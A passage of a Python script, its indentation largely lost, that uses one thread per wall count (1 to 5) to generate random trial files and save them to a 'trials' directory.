output_path = os.path.join(output_dir, nm + '.ptr')
if not os.path.exists(output_path):
print('Thread ' + str(b) + ': Trial ' + nm, file=sys.stderr)
t = MakeRandTrial(nm, b, 0)
t.save(output_path, askoverwrite=False)
if __name__ == '__main__':
    # First arg is the number of trials per block count; since there are
    # 5 block-count variations (1-5 walls), expect an effective total of
    # 5*nTrials trials.
if len(sys.argv) > 1:
nTrials = int(sys.argv[1])
else:
nTrials = 20
# Create directory for output files
output_dir = 'trials'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
threads = []
# Make random trials
for b in range(1,6):
thr = threading.Thread(target=threadMakeTrial, args=(nTrials, b))
thr.start()
threads.append(thr)
for thread in threads:
thread.join()
|